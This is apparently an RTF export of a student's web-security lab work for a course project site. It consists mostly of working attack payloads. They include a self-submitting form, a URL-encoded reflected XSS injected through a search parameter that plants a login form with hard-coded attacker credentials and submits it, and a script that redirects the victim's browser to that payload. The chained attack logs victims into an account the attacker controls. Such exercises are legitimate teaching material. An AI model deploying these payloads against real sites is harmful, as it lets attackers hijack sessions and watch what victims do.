\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </form>\cell \lastrow\row
\pard\pardeftab720\sl520\sa200\partightenfactor0
\cf4 							\cf12 <script>\
\pard\pardeftab720\sl360\partightenfactor0
\cf12     document.forms[0].submit();\
</script>\
\
\
\
%3Cform%20action%3D%22.%2Flogin%22%20method%3D%22post%22%20class%3D%22form-inline%22%3E%0A%0A%3Cp%3ELog%20in%20or%20create%20an%20account.%3C%2Fp%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-space%22%3E%0A%0A%3Cinput%20id%3D%22username%22%20name%3D%22username%22%20type%3D%22text%22%20placeholder%3D%22Username%22%20required%20class%3D%22form-control%22%3E%20%0A%0A%3C%2Fdiv%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-space%22%3E%0A%0A%3Cinput%20id%3D%22userpass%22%20name%3D%22password%22%20type%3D%22password%22%20placeholder%3D%22Password%22%20required%20class%3D%22form-control%22%3E%20%0A%0A%3C%2Fdiv%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-more-space%22%3E%0A%0A%3Cbutton%20id%3D%22log-in-btn%22%20type%3D%22submit%22%20formaction%3D%22.%2Flogin%22%20class%3D%22btn%20btn-default%22%3ELogin%3C%2Fbutton%3E%0A%0A%3Cbutton%20id%3D%22new-account-btn%22%20type%3D%22submit%22%20formaction%3D%22.%2Fcreate%22%20class%3D%22btn%20btn-default%22%3ECreate%20Account%3C%2Fbutton%3E%0A%0A%3C%2Fdiv%3E%0A%0A%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3Cscript%3E%0Adocument.getElementsByTagName('input')%5B%22userpass%22%5D.value%20%3D%20'
\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 \strokec4 l33th4x
\f3\fs26 \cf12 \cb3 \outl0\strokewidth0 '%0Adocument.getElementsByTagName('input')%5B%22username%22%5D.value%20%3D%20'
\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 \strokec4 attacker
\f3\fs26 \cf12 \cb3 \outl0\strokewidth0 '%0A%20%20%20%20document.forms%5B1%5D.submit()%3B%0A%3C%2Fscript%3E%0A\cf11 \outl0\strokewidth0 \strokec11 \
\pard\pardeftab720\sl520\sa200\partightenfactor0

\fs24 \cf4 \cb1 \outl0\strokewidth0 \
\
\
<script> location.href = "https://project2.ecen4133.org/search?q=%3Cform%20action%3D%22.%2Flogin%22%20method%3D%22post%22%20class%3D%22form-inline%22%3E%0A%0A%3Cp%3ELog%20in%20or%20create%20an%20account.%3C%2Fp%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-space%22%3E%0A%0A%3Cinput%20id%3D%22username%22%20name%3D%22username%22%20type%3D%22text%22%20placeholder%3D%22Username%22%20required%20class%3D%22form-control%22%3E%20%0A%0A%3C%2Fdiv%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-space%22%3E%0A%0A%3Cinput%20id%3D%22userpass%22%20name%3D%22password%22%20type%3D%22password%22%20placeholder%3D%22Password%22%20required%20class%3D%22form-control%22%3E%20%0A%0A%3C%2Fdiv%3E%0A%0A%3Cdiv%20class%3D%22form-group%20form-more-space%22%3E%0A%0A%3Cbutton%20id%3D%22log-in-btn%22%20type%3D%22submit%22%20formaction%3D%22.%2Flogin%22%20class%3D%22btn%20btn-default%22%3ELogin%3C%2Fbutton%3E%0A%0A%3Cbutton%20id%3D%22new-account-btn%22%20type%3D%22submit%22%20formaction%3D%22.%2Fcreate%22%20class%3D%22btn%20btn-default%22%3ECreate%20Account%3C%2Fbutton%3E%0A%0A%3C%2Fdiv%3E%0A%0A%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3Cscript%3E%0Adocument.getElementsByTagName('input')%5B%22userpass%22%5D.value%20%3D%20'l33th4x'%0Adocument.getElementsByTagName('input')%5B%22username%22%5D.value%20%3D%20'attacker'%0A%20%20%20%20document.forms%5B1%5D.submit()%3B%0A%3C%2Fscript%3E%0A";\
</script>\
\
\
\
\
\pard\pardeftab720\partightenfactor0
\cf4 \
\
\
\pard\pardeftab720\sl320\partightenfactor0

\f4\fs26 \cf4 \
}